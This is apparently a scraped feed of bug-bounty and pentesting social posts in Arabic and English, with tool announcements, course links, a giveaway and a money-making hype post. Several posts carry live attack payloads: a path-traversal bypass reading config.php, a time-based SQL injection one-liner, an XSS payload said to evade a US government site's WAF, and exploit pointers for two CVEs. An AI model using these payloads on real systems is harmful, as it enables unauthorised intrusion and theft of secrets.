halix Ma
@hivix0
بما اني شخص يحب الScraping طحت على شي حلو هاليومين الllm scrapers كثرانين وطحت على حق jina.ai مخلين ميزتهم مجانيه وبدون لمت وشكلهم قاعدين يحرقون فلوس الseeds والجودة حقت السكريبنق رهيبة مرة حرفيًا اللي تحتاج تسويه هو سطر واحد وجمع لك بيانات لين ماتقول بس ف…
🚨 KNOXSS GIVEAWAY July 2025 ✅ Follow us ✅ Like and share this 🎁 Prize: KNOXSS Pro for 1 Month 🏆 Results: July 7th (3 winners) Want to find some vulns? Get one of our plans and test for #XSS consistently. Sign up now! 😀 knoxss.pro #BugBounty #PenTesting
I'm excited 🎉 to introduce JSSCM! A browser extension that detects expired domains for Stored XSS. So you can find XSS and earn money while casually browsing. I've earned $5K+ in bounties with this extension. Check it out #BugBounty #OpenSource
Detect CyberPanel RCE with Nuclei 🚀 🔹 Template: cloud.projectdiscovery.io/?template=cybe… 🔹 Research by @dreyand_: dreyand.rs/code/review/20… #hackwithautomation #BugBounty #Cybersecurity
Chat GPT is a cash machine But most people don’t know how to make more than $6,200 a month with it Here are my 4 simple steps to do it ↓
🎩New 403 Bypass 🎩 🎩Error: Download.php?file=../config.php ==> 403 🎩 Done: Download.php?file=. /config.php⨀ ==> 200 Download.php?file=⊡ /config.php⨀ ==> 200 Download.php?file= .⊡ /config.php ==> 200
Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability. Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call,…
تقدم CISCO دورات تدريبية وشهادات مجانية 1. تحليلات البيانات skillsforall.com/course/data-an… 2. جافا سكريبت skillsforall.com/course/javascr… 3. أساسيات بايثون skillsforall.com/course/python-… 4. الأمن السيبراني skillsforall.com/ar/course/intr… 5. أساسيات أنظمة التشغيل skillsforall.com/course/operati…
this latest xss extension is so cool :) github.com/elkokc/reflect…
Finding SQLi using Jeeves ⚙️ echo "exampl.com" | gf sqli | qsreplace "(select(0)from(select(sleep(5)))v)" | jeeves --payload-time 10 github.com/ferreiraklet/J… #infosec #bugbountytips #cybersec
Nuclei template that "Analyse" js files for bug bounty hunters : - Extract Tokens. - Extract endpoints. - Extract URLs. - Extract Variables names. (All in one) github.com/ayadim/Nuclei-… By:@ayadim_ #bugbountytips #bugbounty
🚀 Exciting News! The wait is over! BrowserBruter is now public and available for download, the world's first advanced browser-based automated web application penetration testing tool! 📖 The documentation: 🔗 net-square.com/browserbruter/ 📥 Download now: 🔗 github.com/netsquare/Brow…
Use CVE-2024-27198 to freely access internal TeamCity instances, create admin access tokens, and steal secrets and configurations - even if the server is not exposed to the internet. How? 🧵 #1/10
Use ShodanX to find #Originip IP of your Target🎯 More ways: shorturl.at/bwK01 ShodanX: shorturl.at/eruB0
أهلاً وسهلاً، نفتتح اول شرح في سلسلة #شروحات_سيبرانية 🧵 بموضوع خفيف لطيف: Attacking modern JS applications English version: nasser-1.gitbook.io/blog-1/write-u… 1️⃣
كيف قدرت احصل ثغرة 🔴Chain of Rate Limit Bypass and Weak Token Expiry Leads To Account Take Over مسااكم الله بالخير جميعا عدنا لكم ب Chain خفيف لطيف بحاول اشرح الزبدة بأختصار وبسم الله نبدا - فالبداية خل نفهم عملية طلب استعادة كلمة المرور بالموقع - عملية عادية المستخدم يحط…
كيف قدرت القى ثغرة؟ 🔴CSRF Bypass Combined with IDOR To Complete Account Takeover! مساكم الله بالخير جميعا نستكمل سلسلة ال Chain واليوم عدنا لكم ب chian جميل 🔴CSRF Bypass + IDOR To Account Take Over اولا نظرة سريعة عالموقع راح اشرح طبيعة الموقع بشكل عام نقدر نعتبر…
Bypassed strong Akamai WAF of 🇺🇸 Usa Department of Justice 🚔 payload: '"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>" and Casual tone 😎 credit: @coffinxp7 #bugbountytips #infosecurity
This program is designed to demonstrate various process injection techniques github.com/3xpl01tc0d3r/P… #Pentesting #CyberSecurity #Infosec